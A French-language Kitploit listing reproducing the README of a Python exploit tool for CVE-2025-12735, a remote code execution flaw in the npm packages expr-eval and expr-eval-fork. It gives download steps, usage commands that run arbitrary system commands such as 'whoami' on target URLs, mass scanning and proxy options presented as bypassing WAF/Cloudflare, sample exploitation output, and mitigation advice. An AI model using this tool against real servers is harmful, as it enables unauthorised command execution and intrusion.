Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/alnashawatirohwederb2167-max/cve-2025-12735-expr-eval-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubalnashawatirohwederb2167-max/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

Outil de recherche en sécurité pour détecter et tester la CVE-2025-12735 (vulnérabilité RCE dans expr-eval)

Voir le dépôt
13il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-12735 Exploit RCE expr-eval

Un outil de recherche en sécurité pour détecter et tester la vulnérabilité CVE-2025-12735 dans les paquets npm expr-eval et expr-eval-fork.

⚠️ Avertissement

Cet outil est destiné uniquement à des tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez cet outil uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de test.

📋 Aperçu

CVE-2025-12735 est une vulnérabilité critique d'exécution de code à distance (RCE) dans les paquets npm expr-eval et expr-eval-fork. Cette vulnérabilité permet à un attaquant de définir des fonctions arbitraires dans l'objet context utilisé par l'analyseur syntaxique, permettant l'injection de code malveillant qui exécute des commandes système.

Score CVSS : 9,8 (Critique)
Versions affectées : expr-eval-fork < 3.0.0 expr-eval-fork v3.0.0+


Version corrigée :

🔍 Fonctionnalités

  • Détection automatisée : Scanne l'utilisation de la bibliothèque expr-eval dans les fichiers JavaScript
  • Découverte de points de terminaison : Trouve automatiquement les points de terminaison d'évaluation
  • Test de vulnérabilité : Teste la vulnérabilité CVE-2025-12735
  • Exécution de commandes : Démontre la capacité RCE (pour tests autorisés)
  • Support du multi-threading : Scanne plusieurs cibles en parallèle
  • Support des proxys : Contourne les restrictions WAF/Cloudflare
  • Export JSON : Résultats détaillés au format JSON

📦 Installation

Prérequis

  • Python 3.6 ou supérieur
  • pip (gestionnaire de paquets Python)

Installation rapide

root@kitploit:~
# Clonez le dépôt
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# Installez les dépendances
pip install -r requirements.txt

# Rendre le script exécutable (optionnel)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

Alternative : Téléchargement direct

root@kitploit:~
# Téléchargez le script
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# Installez les dépendances
pip install requests

🚀 Utilisation

Utilisation de base

root@kitploit:~
# Cible unique
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# Exécuter une commande personnalisée
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# Plusieurs cibles depuis un fichier
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# Avec thread pour un scan plus rapide
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# Sortie verbeuse pour débogage
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

Utilisation de proxys

root@kitploit:~
# Proxy unique
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# Plusieurs proxys depuis un fichier
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

Options de ligne de commande

root@kitploit:~
-u, --url          URL cible
-f, --file         Fichier contenant les URL cibles (une par ligne)
-c, --command      Commande à exécuter (par défaut : id)
-t, --threads      Nombre de threads (par défaut : 1)
-o, --output       Fichier de sortie (par défaut : uknf_expr_eval_results.json)
-v, --verbose      Activer les logs détaillés
--proxy            URL du proxy (ex : http://127.0.0.1:8080)
--proxy-list       Fichier contenant les URL des proxys (une par ligne)

📊 Sortie

Le script génère un fichier JSON avec les résultats détaillés :

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 Fonctionnement

  1. Phase de détection : Scanne les fichiers JavaScript et le contenu HTML pour les références à expr-eval
  2. Découverte de points de terminaison : Teste les points de terminaison API courants susceptibles d'utiliser expr-eval
  3. Test de vulnérabilité : Tente d'injecter des fonctions arbitraires dans l'objet context
  4. Exploitation : Si vulnérable, démontre la capacité RCE

🛡️ Atténuation

Si vous utilisez expr-eval ou expr-eval-fork :

  1. Mettez à jour immédiatement :

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. Appliquez le correctif de sécurité :

    • Appliquez la Pull Request #288 à expr-eval
    • Ou passez à expr-eval-fork v3.0.0+
  3. Implémentez la validation des entrées :

    • Assainissez toutes les entrées utilisateur
    • Utilisez une liste blanche de fonctions
    • Validez les objets context

📚 Références

  • CVE : CVE-2025-12735
  • CERT : VU#263614
  • Avis GitHub : GHSA-jc85-fpwf-qm7x
  • Correctif de sécurité : PR #288

📖 Exemples

Exemple 1 : Scan d'une cible unique

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

Exemple 2 : Plusieurs cibles avec sortie

root@kitploit:~
# Créez un fichier de cibles
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Lancez le scan
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

Exemple 3 : Exécution de commande personnalisée

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

Exemple 4 : Utilisation de proxys

root@kitploit:~
# Proxy unique
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# Plusieurs proxys depuis un fichier
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 Contribution

Les contributions sont les bienvenues ! N'hésitez pas à soumettre une Pull Request.

  1. Forkez le dépôt
  2. Créez votre branche de fonctionnalité (git checkout -b feature/AmazingFeature)
  3. Commitez vos modifications (git commit -m 'Add some AmazingFeature')
  4. Poussez vers la branche (git push origin feature/AmazingFeature)
  5. Ouvrez une Pull Request

🐛 Problèmes

Si vous rencontrez des problèmes ou avez des suggestions, veuillez ouvrir un problème (issue) sur GitHub.

📝 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

⭐ Historique des étoiles

Si vous trouvez cet outil utile, pensez à lui donner une étoile sur GitHub !

⚖️ Mentions légales

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Les auteurs ne sont pas responsables de toute mauvaise utilisation ou des dommages causés par ce programme. Les utilisateurs sont responsables de s'assurer qu'ils disposent des autorisations appropriées avant de tester un système.

🙏 Remerciements

  • Rapporteur de la vulnérabilité originale : Jangwoo Choe (UKO)
  • Centre de coordination CERT pour la divulgation de la vulnérabilité
  • GitHub Security et npm pour les avis de sécurité

💰 Dons

Si vous trouvez cet outil utile et souhaitez soutenir le projet :

Bitcoin (BTC) :

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH) :

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Merci pour votre soutien ! 🙏

Télécharger l’outil